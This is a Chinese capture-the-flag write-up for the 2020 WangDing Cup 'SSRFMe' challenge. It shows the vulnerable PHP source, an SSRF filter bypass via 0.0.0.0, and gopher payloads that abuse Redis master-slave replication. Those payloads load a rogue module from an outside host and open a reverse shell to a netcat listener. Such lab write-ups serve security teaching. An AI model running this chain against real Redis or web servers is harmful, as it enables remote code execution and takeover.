![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/2-1652694827.gif "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
在BUU做的复现
function check_inner_ip($url){$match_result=preg_match('/^(http|https|gopher|dict)?://.*(/)?.*$/',$url);if (!$match_result){die('url fomat error');}try{$url_parse=parse_url($url);}catch(Exception $e){die('url fomat error');return false;}$hostname=$url_parse['host'];$ip=gethostbyname($hostname);$int_ip=ip2long($ip);return ip2long('127.0.0 n.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;}function safe_request_url($url){if (check_inner_ip($url)){echo $url.' is inner ip';}else{$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);$output = curl_exec($ch);$result_info = curl_getinfo($ch);if ($result_info['redirect_url']){safe_request_url($result_info['redirect_url']);}curl_close($ch);var_dump($output);}}if(isset($_GET['url'])){$url = $_GET['url'];if(!empty($url)){safe_request_url($url);}}else{highlight_file(__FILE__);}// Please visit hint.php locally.
https://blog.csdn.net/qq_39293438/article/details/84899550这里面关于 curl 的利用提到了,当处理这个地址时
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/8-1652694829.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
curl 和 php_url_parse 处理后最终的目标不一样
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/4-1652694831.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
当 php_url_parse 认为 google.com 为目标的同时,curl 认为 evil.com:80 是目标。
也可以使用 DNS 重绑定(DNS rebinding)浅谈DNS重绑定漏洞
我用的是
?url=http://0.0.0.0/hint.php //0.0.0.0代表本机 ipv4 的所有地址
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/7-1652694833.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
得到redis psss
用主从复制打 目录为有权限的/tmp
主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中,但是如果硬盘的数据被删除的话数据就无法恢复了,如果通过主从复制就能解决这个问题,主redis的数据和从redis上的数据保持实时同步,当主redis写入数据是就会通过主从复制复制到其它从redis。
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/10-1652694835.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/3-1652694837.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
gopher://0.0.0.0:6379/_auth rootconfig set dir /tmp/quit//这里要二次url编码gopher://0.0.0.0:6379/_auth%2520root%250aconfig%2520set%2520dir%2520%252ftmp%252f%250aquitgopher://0.0.0.0:6379/_auth rootconfig set dbfilename exp.soslaveof 174.1.160.222 6666quitgopher://0.0.0.0:6379/_auth rootmodule load /tmp/exp.sosystem.rev 174.1.160.222 6663quit
用rogue-server.py架起rogue 服务器,另外再监听6663端口。也就是说6666端口监听用来主从复制传输exp.so ,6663端口接收反弹shell。
rogue-server.py 来自
https://github.com/xmsec/redis-ssrf (用这里的ssrf-redis.py是可以直接生成执行命令的payload,但buu的这我cat /flag一直打不出flag,whoami,pwd是有结果回显,很奇怪不知道啥原因)
exp.so 来自
https://github.com/n0b0dyCN/redis-rogue-serverredis连接过后就这样,记得写个死循环跑rogue-server.py 不然一连上就自动断开连接。可能导致exp.so都没传完就中断了。
while [ "1" = "1" ]dopython rogue-server.pydone
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/4-1652694838.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
再开个窗口nc -lvvp 6663监听就行
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/8-1652694840.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/1-1652694841.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
原文来自CSDN博主「Arnoldqqq」|侵删
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/2-1652694842.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/5-1652694844.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](https://cn-sec.com/wp-content/uploads/2022/05/0-1652694846.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](https://cn-sec.com/wp-content/uploads/2022/05/0-1652694848.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
。想加入我们就给我们留言吧![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/9-1652694849.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
。![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/6-1652694851.gif "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/7-1652694852.gif "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
![[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/4-1652694855.png "[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解")
原文始发于微信公众号(寰宇卫士):[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论